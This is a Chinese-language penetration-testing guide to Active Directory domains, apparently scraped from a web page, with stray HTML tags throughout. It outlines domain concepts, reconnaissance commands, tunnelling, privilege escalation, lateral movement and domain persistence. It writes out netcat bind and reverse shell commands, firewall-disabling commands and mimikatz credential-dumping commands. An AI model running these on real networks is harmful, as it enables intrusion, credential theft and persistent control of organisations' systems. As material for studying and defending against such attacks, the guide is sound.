内网域渗透全面指南<\/h1>

1. 内网渗透测试基础知识<\/h2>

1.1 工作组<\/h3>

工作组中的所有计算机是对等的，没有集中管理机制<\/li>

每台计算机独立管理自己的资源和用户账户<\/li> <\/ul>

1.2 域<\/h3>

域是有安全边界的计算机集合<\/li>
访问域内资源需要合法身份登录域<\/li>
权限取决于用户在域内的身份<\/li>

域控制器(DC)<\/strong>：管理服务器，负责所有计算机和用户的验证工作

存储所有账号和密码散列值<\/li>
所有权限身份认证都在DC上进行<\/li> <\/ul> <\/li>
域管理员只能管理本域，跨域访问需要建立信任关系<\/li>
域使用DNS定位资源，域名即DNS域名<\/li> <\/ul>
1.3 活动目录(AD)<\/h3>

提供目录服务的组件<\/li>
存储网络对象信息：用户、组、计算机、共享资源、打印机等<\/li>
相当于网络资源的索引和快捷方式<\/li> <\/ul>
1.4 域控制器和活动目录的区别<\/h3>

安装AD的计算机就变成DC<\/li> <\/ul>
1.5 域中计算机分类<\/h3>

域控制器<\/strong>：运行AD的计算机<\/li>
成员服务器<\/strong>：

安装服务器OS并加入域<\/li>
未安装AD<\/li>
提供网络资源(文件服务器、应用服务器等)<\/li> <\/ul> <\/li>
客户机<\/strong>：

安装其他OS的计算机<\/li>
使用域账户登录域<\/li> <\/ul> <\/li>
独立服务器<\/strong>：

不加入域也不安装AD<\/li> <\/ul> <\/li> <\/ol>
1.6 域内权限解读<\/h3>

域本地组<\/strong>：<\/p>

授予本域内资源访问权限<\/li>
例如Administrators组：不受限制存取计算机\/域资源<\/li> <\/ul> <\/li>

全局组<\/strong>：<\/p>

单域用户访问多域资源<\/li>
只能在创建域中添加用户和全局组<\/li>
重要全局组：

Domain Admins：域内所有服务器和DC默认拥有完整管理员权限<\/li>
Enterprise Admins：域森林根域中的组，每个域内都是Administrators成员<\/li>
Domain Users：所有域成员默认属于此组<\/li> <\/ul> <\/li> <\/ul> <\/li>

通用组<\/strong>：<\/p>

成员来自域森林中任何域<\/li>
可在域森林中任何域指派权限<\/li>
适合跨域访问<\/li>
成员信息保存在全局编录中<\/li> <\/ul> <\/li> <\/ol>
总结关系<\/strong>：<\/p>

域本地组：来自全林，作用于本域<\/li>
全局组：来自本域，作用于全林<\/li>
通用组：来自全林，作用于全林<\/li> <\/ul>
2. 内网信息收集<\/h2>
2.1 收集本机信息<\/h3>

网络配置：ipconfig \/all<\/code><\/li>
操作系统信息：systeminfo | findstr \/B \/C:"OS NAME" \/C:"OS Version"<\/code><\/li>
安装软件：wmic product get name,version<\/code><\/li>
服务信息：wmic service list brief<\/code><\/li>
进程列表：tasklist<\/code> 或 wmic process list brief<\/code><\/li>
启动程序：wmic startup get command,caption<\/code><\/li>
计划任务：schtasks \/query \/fo LIST \/v<\/code><\/li>
开机时间：net statistics workstation<\/code><\/li>
用户信息：用户列表：net user<\/code><\/li> 本地管理员：net localgroup administrators<\/code><\/li> 在线用户：query user<\/code> 或 qwinsta<\/code><\/li> <\/ul> <\/li> 会话信息：net session<\/code><\/li> 端口列表：netstat -ano<\/code><\/li> 补丁信息： systeminfo<\/code><\/li> wmic qfe get Caption,Description,HotFixID,InstalledOn<\/code><\/li> <\/ul> <\/li> 共享列表： net share<\/code><\/li> wmic share get name,path,status<\/code><\/li> <\/ul> <\/li> 网络信息：路由表：route print<\/code><\/li> ARP缓存：arp -a<\/code><\/li> <\/ul> <\/li> 防火墙配置：关闭防火墙： 2003及以前：netsh firewall set opmode disable<\/code><\/li> 2003以后：netsh advfirewall set allprofiles state off<\/code><\/li> <\/ul> <\/li> 查看配置：netsh firewall show config<\/code><\/li> <\/ul> <\/li> 代理配置：reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"<\/code><\/li> <\/ol> 2.2 查询当前权限<\/h3> 当前权限：whoami<\/code> 机器用户：机器名+"$"，System用户对应域内机器用户<\/li> System权限可运行域内查询命令<\/li> Administrators权限可提升为System权限<\/li> <\/ul> <\/li> 获取SID：whoami \/all<\/code><\/li> 用户详细信息：net user username \/domain<\/code><\/li> <\/ol> 2.3 判断是否在域<\/h3> ipconfig \/all<\/code>：查看DNS后缀列表<\/li> systeminfo<\/code>：查看"域"信息<\/li> net config workstation<\/code>：查看"工作域站"<\/li> net time \/domain<\/code>：判断主域(域服务器通常作为时间服务器)<\/li> <\/ol> 2.4 收集域内基础信息<\/h3> 查询域：net view \/domain<\/code><\/li> 查询域内计算机：net view \/domain:XXX<\/code><\/li> 查询域内计算机列表：net group \/domain<\/code><\/li> 查询域成员计算机：net group "domain computers" \/domain<\/code><\/li> 获取域密码策略：net accounts \/domain<\/code><\/li> 获取域信任信息：nltest \/domain_trusts<\/code><\/li> <\/ol> 2.5 查找域控<\/h3> 查看时间服务器：net time \/domain<\/code>(通常为主域控制器)<\/li> 查看域控制器组：net group "Domain Controllers" \/domain<\/code><\/li> 获取域控列表：nltest \/DCLIST:XXX<\/code><\/li> <\/ol> 2.6 查询域内用户和管理员信息<\/h3> 查询域用户：所有用户：net user \/domain<\/code><\/li> 详细信息：wmic useraccount get \/all<\/code><\/li> 存在用户：dsquery user<\/code><\/li> 本地管理员：net localgroup administrators<\/code><\/li> <\/ul> <\/li> 查询域管理员： net group "Domain admins" \/domain<\/code><\/li> net group "Enterprise Admins" \/domain<\/code><\/li> <\/ul> <\/li> <\/ol> 3. 隐藏通信隧道技术<\/h2> 3.1 隧道分类<\/h3> 网络层<\/strong>：IPv6隧道、ICMP隧道、GRE隧道<\/li> 传输层<\/strong>：TCP隧道、UDP隧道、常规端口转发<\/li> 应用层<\/strong>：SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道<\/li> <\/ul> 3.2 网络层隧道<\/h3> IPv6隧道<\/strong>：通过IPv4隧道传送IPv6数据报文，将IPv6报文整体封装到IPv4中<\/li> <\/ul> 3.3 传输层隧道<\/h3> nc(netcat)<\/strong> 正向shell： # Linux<\/span> <\/span><\/span>nc -lvp 4444<\/span> -e \/bin\/bash <\/span><\/span># Windows<\/span> <\/span><\/span>nc -lvp 4444<\/span> -e c:\w<\/span>indows\s<\/span>ystem32\c<\/span>md.exe <\/span><\/span>nc 192.168.1.11 4444<\/span> <\/span><\/span><\/code><\/pre><\/li> 反向shell： # Target<\/span> <\/span><\/span>nc -e \/bin\/bash Lhost port <\/span><\/span># Hacker<\/span> <\/span><\/span>nc -lvvp port <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 3.4 应用层隧道<\/h3> SSH隧道<\/strong> 本地转发： ssh -CfNg -L LPORT:RHOST:RPORT root@192.168.1.11(<\/span>跳板机)<\/span> <\/span><\/span><\/code><\/pre>参数说明： -C：压缩数据<\/li> -f：后台运行<\/li> -N：静默连接<\/li> -g：允许远程主机连接本地转发端口<\/li> -L：本地端口转发<\/li> -R：远程端口转发<\/li> -D：动态转发(socks代理)<\/li> -P：指定SSH端口<\/li> <\/ul> <\/li> 远程转发： ssh -SfNg -R LPORT(<\/span>攻击机端口)<\/span>:RHOST:RPORT root@跳板机 <\/span><\/span><\/code><\/pre>原理：在远程主机监听端口，所有访问该端口的数据通过SSH隧道传输到本地对应端口<\/li> 动态转发： ssh -CfNg -D 7000<\/span> root@192.168.1.11(<\/span>跳板机)<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 4. 权限维持<\/h2> 4.1 Windows权限等级<\/h3> User<\/li> Administrator<\/li> System：可读取SAM等敏感文件<\/li> TrustedInstaller：最高权限，可修改系统文件<\/li> <\/ol> 4.2 提权方法<\/h3> 系统内核溢出漏洞提权<\/strong><\/li> Windows配置错误利用<\/strong> 低权限用户以System权限运行安装文件<\/li> 可信任服务路径漏洞(包含空格且没有引号的路径)<\/li> 自动安装配置文件包含敏感信息<\/li> <\/ul> <\/li> 组策略首选项提权<\/strong> SYSVOL是存储公共文件服务器副本的共享文件夹<\/li> 域内所有域控制器之间复制<\/li> 查找包含cpassword的XML文件(私钥已公布)<\/li> <\/ul> <\/li> UAC提权<\/strong><\/li> 无凭证条件下的权限获取<\/strong> LLMNR(本地链路多播解析)欺骗 DNS不可用时使用LLMNR解析本地机器名称<\/li> <\/ul> <\/li> NetBIOS欺骗根据NetBIOS协议广播获得计算机名称并解析为IP<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 5. 域内横向移动<\/h2> 5.1 IPC$共享<\/h3> 实现进程间通信的命名管道<\/li> 建立条件：开启139(NetBIOS)、445(共享文件)端口<\/li> 开启默认共享<\/li> <\/ol> <\/li> <\/ul> 5.2 获取远程主机信息<\/h3> dir<\/code>命令<\/li> tasklist<\/code>命令<\/li> <\/ul> 5.3 Windows系统散列值获取<\/h3> 散列类型<\/strong> LM Hash(DES加密)<\/li> NTLM Hash(MD4加密)<\/li> <\/ul> <\/li> 抓取方法<\/strong> 从lsass.exe进程导出(实现Windows安全策略的进程)<\/li> 使用mimikatz： lsadump::sam <\/span><\/span>sekurlsa::logonpasswords <\/span><\/span><\/code><\/pre>(注意：Wdigest关闭会导致无法抓取明文密码)<\/li> <\/ul> <\/li> 防范措施<\/strong> 从administrators组删除具有Debug权限的本地管理员<\/li> 关闭Wdigest<\/li> 安装kb2871997补丁(仍需禁用默认Administrators账号)<\/li> 加入"Protected Users"全局安全组<\/li> <\/ul> <\/li> <\/ol> 5.4 哈希传递攻击<\/h3> 前提条件<\/strong> 大量计算机使用相同的本地管理员账号和密码<\/li> <\/ul> <\/li> 攻击类型<\/strong> NTLM Hash传递<\/li> AES-256密钥传递<\/li> <\/ul> <\/li> <\/ol> 5.5 票据传递攻击(PTT)<\/h3> 注意事项：使用主机名而非IP地址(如dir命令)<\/li> 票据文件注入内存默认有效时间10小时<\/li> 不需要mimikatz本地管理员权限<\/li> <\/ol> <\/li> <\/ul> 5.6 横向移动工具<\/h3> Psexec<\/strong> 通过命令行与目标机器连接<\/li> 要求：远程系统开启admin$共享(默认开启)<\/li> 特点：建立ipc$连接后无需输入账号密码<\/li> 在目标系统创建psexec服务(执行后自动删除)<\/li> 可直接获得System权限的交互式shell<\/li> 会产生大量日志可被溯源<\/li> <\/ul> <\/li> <\/ul> <\/li> Metasploit中的psexec模块<\/strong><\/li> WMI<\/strong> 使用wmic<\/code>命令(无回显，需配合ipc$和type命令读取信息)<\/li> <\/ul> <\/li> smbexec<\/strong> 通过文件共享(admin$, c$<\/span>, ipc$, d$<\/span>)在远程执行命令<\/li> <\/ul> <\/li> <\/ol> 6. 域控制器安全<\/h2> 6.1 提取ntds.dit<\/h3> ntds.dit包含活动目录所有数据(用户名、散列值、组、GPP、OU等)<\/li> 被Windows锁定，可使用卷影拷贝服务(快照)提取<\/li> <\/ul> 6.2 使用dcsync获取域散列值<\/h3> mimikatz的dcsync功能可直接提取ntds.dit并检索域散列值<\/li> <\/ul> 6.3 Kerberos域用户提权漏洞<\/h3> 漏洞原因<\/strong>：用户可伪造Kerberos票据<\/li> KDC未验证票据签名<\/li> 返回的TGT使普通用户获得域管理员权限<\/li> 可访问域内资源<\/li> <\/ul> <\/li> <\/ul> 7. 跨域攻击<\/h2> 7.1 攻击方法<\/h3> 哈希传递攻击<\/li> 票据传递攻击<\/li> 利用信任关系进行跨域攻击<\/li> <\/ol> 8. 域控制器持久化<\/h2> 8.1 DSRM域后门<\/h3> DSRM(目录服务恢复模式)：域控制器安全模式启动选项<\/li> 用于还原、修复活动目录数据库<\/li> <\/ul> <\/li> 使用方法：使用KB961320同步指定域账号密码到DSRM密码<\/li> 利用DSRM账号控制域控<\/li> <\/ul> <\/li> <\/ul> 8.2 SSP维持域控权限<\/h3> SSP(安全支持提供程序)： DLL文件，实现身份认证<\/li> 系统启动时加载到lsass.exe<\/li> <\/ul> <\/li> 攻击方法：扩展LSA，注入恶意DLL到lsass.exe<\/li> 获取明文密码<\/li> <\/ul> <\/li> <\/ul> 8.3 SID History域后门<\/h3> SID History用于域迁移时保持用户权限<\/li> 攻击方法：将管理员SID添加到恶意用户的SID History属性<\/li> <\/ul> <\/li> <\/ul> 8.4 黄金票据<\/h3> 伪造TGT，依赖于krbtgt账号的NTLM HASH或AES-256<\/li> 特点：可伪造域内任意用户身份<\/li> 只要TGT被正确加密，所有信息都被KDC信任<\/li> <\/ul> <\/li> <\/ul> 8.5 白银票据<\/h3> 伪造TGS，依赖于服务账号的密码散列值<\/li> <\/ul>